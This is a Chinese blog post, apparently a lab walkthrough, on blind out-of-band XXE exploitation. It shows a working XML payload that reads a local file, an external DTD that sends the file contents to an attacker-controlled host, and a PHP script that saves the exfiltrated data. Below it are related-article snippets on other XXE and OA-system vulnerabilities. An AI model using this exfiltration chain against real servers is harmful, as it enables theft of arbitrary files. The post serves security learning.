XXE漏洞——无回显外带生成文件

最新推荐文章于 2023-12-25 14:03:34 发布
最新推荐文章于 2023-12-25 14:03:34 发布
阅读量336 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65544268/article/details/131923016
版权

XXE平台:192.168.5.108

攻击机:192.168.5.160

前提:本次实验两台主机都使用的phpstudy搭建环境,XXE平台主机可以访问到攻击机

 输入账号密码,使用BP随机抓取一组数据包

 

 Payload:

<?xml version="1.0"?>
<!DOCTYPE aa [
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % aa SYSTEM "http://192.168.5.160/a.dtd" > 
%aa;
%ss;
]>

a.dtd

<!ENTITY % ss "<!ENTITY send SYSTEM 'http://192.168.5.160/get.php?file=%file;'>">

get.php

<?php
$file = $_GET['file'];
$myfile = fopen("c://file.txt", "w+");   //写入到本机
fwrite($myfile, $file);            //将file中的内容写入到本机c盘file文件中
fclose($myfile);
?>

攻击机目录

这样我们可以读取到目标主机的任意文件写入到c://file.txt中

这样我们就写入到文件中了。 

 

 

LVzuiSuai
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】复现泛微OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 2401
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0xSec
07-23 5897
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
2018 SUCTF Homework xxe外带数据~~ xxe进行ssrf
a3320315的博客
02-12 1649
题目介绍 注册账号,登录作业平台。看到一个calc计算器类。有两个按钮,一个用于调用calc类实现两位数的四则运算。另一个用于提交代码。 我们点击cacl按钮,计算2+2=4,我们观察参数,再结合代码可知module为调用的类,args为类的构造方法的参数~ 在PHP中存在内置类。其中包括SimpleXMLElement,文档中对于SimpleXMLElement::__construct定义如下...
xxe主看这个1】学习xxe稍微进阶的知识 ---- OOB xxe盲注,外带
Zero_Adam的博客
04-12 1511
目录:1. 基本知识2.XML的安全性问题当文件内容和 xml 格式相冲突的时候,其他利用 https://www.freebuf.com/video/209186.html 这个是那个pvs的网站,要学习一下curl命令,然后就可以当作一个vps来用了 https://beeceptor.com/console/qwert 1. 基本知识 xml是一种可扩展标记语言,和html类似, 主要区别是 HTML 主要和 数据表示相关。而xml 更多与数据传输和存储有关。 xml可以用在这些地方,等等 我们现在
XXE回显(使用vps-payload外带
per_se_veran_ce的博客
03-22 2263
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
java回显字符_java的xxe回显的带外传输
weixin_35936248的博客
02-27 602
xxe回显的情况下,正常的读取无特殊符号文件的时候可以只用常规的file协议来进行读取比如payload:%xd;]>&bbbb;引入的外部dtd内容为如下:">%demo;返回的内容:如果正常的内容是可以的,如果带有特殊符号的话 可以用http和ftp的带外传输方法比如ftp的带外传输payload:%xd;]>&bbbb;外部引入的dtd内容为如下:"&gt...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
xxe主看这个吧】xml --xxe 各种注入学习 也就一些基本的方法,再加一个 xxe盲注,vps外带
Zero_Adam的博客
04-10 280
目录:一、基础知识:二、注入方法:1. 直接通过DTD外部实体声明2. 通过DTD文档引入外部DTD文档,再引入外部实体声明3. 通过DTD外部实体声明引入 外部实体声明三、产生的危害:1. 读取任意文件2. XXE回显使用vps外带 一、基础知识: 基础看这篇就好 二、注入方法: 1. 直接通过DTD外部实体声明 内部实体声明,应该是无法触发xxe漏洞的,所以我们用的应该都是 外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西?。。不是呀,这个应该就不影响了,只是 system 后面的
【严重】泛微 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1059
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。泛微 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 889
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
泛微OA系统远程命令执行漏洞
chaojixiaojingang
08-21 5912
1.漏洞描述 泛微OA办公系统存在远程命令执行漏洞,由于泛微办公系统的Java Beanshell接口可被未授权,攻击者通过调用该Beanshell接口,构造特定的HTTP请求绕过泛微本身一些安全限制造成远程命令执行,获取服务器完全控制权限。 2.漏洞复现 1)访问泛微办公系统:http://xx.xx.140.21:8090/login/Login.jsp?logintype=1 2)在URL后添加/weaver/bsh.servlet.BshServlet,得到命令执行环境: ...
xxe注入漏洞
m0_55306747的博客
08-05 1262
1.我们知道xml文档由xml标记语言进行编写,可以自定义标签以及属性而dtd文档的存在则是去约束这个自定义的范围,让其趋近于某个规则,使其标准化格式化,方便数据传递与处理。2.dtd文档可以写在xml文档的开头,这样的dtd文档被成为内部声明当然也可以通过dtd的语法引用外部dtd文档的内容,这种dtd文档的嵌入方法称为外部声明(ps:可以类比一下html文件的css)实体就是代表,就是变量,是快捷引用一段内容,快捷引用一段文本的一种方式,比如.........
9、XXE漏洞
denie6587的博客
07-15 401
9 XXE 概念 XML External Entity Injection,即xml外部实体注入漏洞,发生在应用程序解析XML输入时,美欧禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起DdoS攻击等危害 触发点 往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意x...
【每天学习一点新知识】XXE(XML外部实体注入)从入门到放弃
RexHa的博客
10-29 2110
XML 指可扩展标记语言(EXtensibleMarkupLanguage)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML——XML介绍和基本语法_KLeonard的博客-CSDN博客_xml本文介绍了XML语言的历史,以及它的作用和常见的应用。重点介绍了XML文件的语法规则。
漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞(附漏洞检测脚本)
最新发布
jjjj1029056414的博客
12-25 1367
漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞,附带自己写的poc脚本
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值